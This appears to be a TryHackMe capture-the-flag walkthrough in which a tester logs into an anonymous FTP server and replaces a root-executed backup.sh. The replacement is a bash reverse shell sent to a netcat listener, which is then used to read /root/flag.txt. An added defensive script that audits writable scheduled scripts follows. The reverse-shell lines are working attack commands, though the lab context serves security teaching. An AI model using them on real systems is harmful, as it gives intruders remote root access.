Anyone can be Santa!
Networking - FTP
The standard ports for these two connections are:
Port 20 (Data)
Port 21 (Commands)
bash -i >& /dev/tcp/Your_TryHackMe_IP/4444 0>&1
Challenge
Name the directory on the FTP server that has data accessible by the "anonymous" user
ftp 10.10.130.142
anonymous
ls

public
What script gets executed within this directory?
ftp 10.10.130.142
anonymous
ls
cd public
ls

backup.sh
What movie did Santa have on his Christmas shopping list?
ftp 10.10.130.142
anonymous
cd public
get shoppinglist.txt
quit
cat shoppinglist.txt

The Polar Express
Re-upload this script to contain malicious data (just like we did in section 9.6). Output the contents of /root/flag.txt!
Note that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have set up a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.
ftp 10.10.130.142
anonymous
cd public
get backup.sh

vi backup.sh
bash -i >& /dev/tcp/10.14.4.204/4444 0>&1

put backup.sh

nc -lnp 4444
cd /root
cat flag.txt

THM{even_you_can_be_santa}
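
The steps above work because a script that runs with enough privilege to read /root sits in a directory the anonymous FTP user can write to. The following is an added example, not part of the original walkthrough, of a check an administrator can run against any scheduled script; the function names is_loose, dir_replaceable and audit_script are hypothetical, and the script paths are passed as arguments because the page does not give the server-side path of backup.sh.

```sh
#!/bin/sh
# Added example: flag scripts that a privileged job runs but that an
# unprivileged account (such as the FTP "anonymous" user) could replace.

# is_loose PATH: succeeds when PATH itself is group- or world-writable.
is_loose() {
    [ -n "$(find "$1" -maxdepth 0 \( -perm -0020 -o -perm -0002 \) 2>/dev/null)" ]
}

# dir_replaceable DIR: succeeds when DIR is group- or world-writable and has
# no sticky bit, so a non-owner can delete a file in it and re-create it.
dir_replaceable() {
    [ -n "$(find "$1" -maxdepth 0 \( -perm -0020 -o -perm -0002 \) \
            ! -perm -1000 2>/dev/null)" ]
}

# audit_script PATH: prints findings; returns 0 if clean, 1 if the script
# can be tampered with, 2 if it does not exist.
audit_script() {
    script=$1
    rc=0
    if [ ! -e "$script" ]; then
        echo "MISSING  $script"
        return 2
    fi
    if is_loose "$script"; then
        echo "WRITABLE $script (file mode allows group/other write)"
        rc=1
    fi
    dir=$(dirname "$script")
    if dir_replaceable "$dir"; then
        echo "WRITABLE $dir (directory allows replacing $script)"
        rc=1
    fi
    if [ "$rc" -eq 0 ]; then
        echo "OK       $script"
    fi
    return "$rc"
}

# Audit every path given on the command line, e.g. each script named in
# root's crontab.
for s in "$@"; do
    audit_script "$s" || true
done
```

Any WRITABLE line for a script that root executes means the script should be moved out of the FTP tree or the upload permission removed.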